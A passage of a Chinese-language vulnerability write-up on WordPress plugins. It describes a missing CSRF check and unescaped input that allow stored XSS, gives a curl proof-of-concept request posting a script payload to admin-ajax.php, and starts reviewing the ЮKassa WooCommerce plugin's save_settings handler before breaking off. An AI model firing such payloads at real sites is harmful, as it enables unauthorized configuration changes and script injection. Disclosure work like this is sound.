在由于没有对导步AJAX执行进行CSRF验证导致验证用户，如subscriber也可以随意更新插件配置，而由于缺少特殊字符的转义和过滤，由此 导致了XSS的漏洞，POC如下 curl ‘http://example.com/wp-admin/admin-ajax.php’ –data ‘action=as_edit_pins_page&post_title=<script>alert(String.fromCharCode(88,83,83))</script>&post_id=9’ PS：这个ID 9 必需是存在的

ЮKassa для WooCommerce plugin 是一款支持RUSSIA支付yandex的一款商场插件， 在文件yookassa/admin/yookassaadmin.php 第58行add_action( ‘wp_ajax_yookassa_save_settings’, array( $this, ‘save_settings’ ) ); 中save_settings函数被挂在wp_ajax_yookassa_save_settings上， 在第563-604行中的save_settings函数，我们看下 public function save_settings() { header(‘Content-Type: application/json’); if (!is_ajax()) { echo json_encode(array(‘status’ => ‘error’, ‘error’ => …